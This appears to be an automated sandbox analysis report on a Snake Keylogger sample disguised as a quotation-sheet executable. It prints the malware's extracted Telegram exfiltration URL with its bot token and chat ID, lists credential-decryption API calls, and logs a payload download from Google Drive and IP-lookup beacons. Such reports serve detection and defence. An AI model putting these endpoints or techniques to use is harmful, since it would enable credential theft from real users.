Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"} |
Source: z1QuotationSheetVSAA6656776.exe |
ReversingLabs: Detection: 50% |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784BBC8 CryptUnprotectData, |
131_2_3784BBC8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784C302 CryptUnprotectData, |
131_2_3784C302 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784C250 CryptUnprotectData, |
131_2_3784C250 |
Source: z1QuotationSheetVSAA6656776.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: unknown |
HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2 |
Source: z1QuotationSheetVSAA6656776.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00406167 FindFirstFileA,FindClose, |
0_2_00406167 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
0_2_00405705 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00402688 FindFirstFileA, |
0_2_00402688 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00406167 FindFirstFileA,FindClose, |
131_2_00406167 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
131_2_00405705 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00402688 FindFirstFileA, |
131_2_00402688 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 0016F1FEh |
131_2_0016F01B |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 0016FB88h |
131_2_0016F01B |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016E530 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016EB63 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016ED44 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841A38h |
131_2_37841620 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841471h |
131_2_378411C0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F9A7h |
131_2_3784F700 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784FDFFh |
131_2_3784FB58 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F54Fh |
131_2_3784F2A8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov esp, ebp |
131_2_3784DEB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F0F7h |
131_2_3784EE50 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784E847h |
131_2_3784E5A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784EC9Fh |
131_2_3784E9F8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37840BB1h |
131_2_37840900 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784E3EFh |
131_2_3784E148 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841A38h |
131_2_37841966 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841011h |
131_2_37840D60 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37840751h |
131_2_378404A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 378402F1h |
131_2_37840040 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B92E57h |
131_2_37B92BB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9B4A3h |
131_2_37B9B168 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B99E58h |
131_2_37B99BB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B91447h |
131_2_37B911A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9189Fh |
131_2_37B915F8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B98877h |
131_2_37B985D0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B999D7h |
131_2_37B99730 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
131_2_37B95F18 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9AFB7h |
131_2_37B9AD10 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
131_2_37B95F15 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B925A7h |
131_2_37B92300 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9841Fh |
131_2_37B98178 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B929FFh |
131_2_37B92758 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B90FEFh |
131_2_37B90D48 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B93B5Fh |
131_2_37B938B8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9AB5Fh |
131_2_37B9A8B8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9214Fh |
131_2_37B91EA8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9073Fh |
131_2_37B90498 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B99127h |
131_2_37B98E80 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B97F9Fh |
131_2_37B97CF8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B90B97h |
131_2_37B908F0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9957Fh |
131_2_37B992D8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B98CCFh |
131_2_37B98A28 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9A2AFh |
131_2_37B9A008 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B932AFh |
131_2_37B93008 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9A707h |
131_2_37B9A460 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B93707h |
131_2_37B93460 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B91CF7h |
131_2_37B91A50 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B902E7h |
131_2_37B90040 |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: Joe Sandbox View |
IP Address: 158.101.44.242 158.101.44.242 |
Source: Joe Sandbox View |
IP Address: 172.67.177.134 172.67.177.134 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
DNS query: name: checkip.dyndns.org |
Source: unknown |
DNS query: name: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034F59000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":" |